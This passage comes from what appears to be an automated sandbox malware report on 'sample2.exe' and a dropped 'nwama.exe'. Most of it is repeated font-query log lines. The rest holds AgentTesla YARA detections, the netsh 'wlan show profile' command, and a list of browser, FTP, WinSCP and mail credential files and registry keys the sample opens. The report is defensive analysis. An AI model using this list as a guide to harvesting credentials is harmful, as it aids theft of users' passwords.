                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Uses netsh to modify the Windows network and firewall settingsShow sources
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.721770177.0000000003F4A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.987505021.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.996293991.0000000003865000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.992160350.0000000003704000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.987543673.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.737377613.000000000416B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.993193122.00000000032F8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sample2.exe PID: 7104, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sample2.exe PID: 5652, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 6508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 6592, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 5848, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwama.exe PID: 7068, type: MEMORY
                  Source: Yara matchFile source: 1.2.sample2.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.nwama.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.nwama.exe.400000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\sample2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal WLAN passwordsShow sources
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\Desktop\sample2.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\sample2.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\sample2.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\sample2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\sample2.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
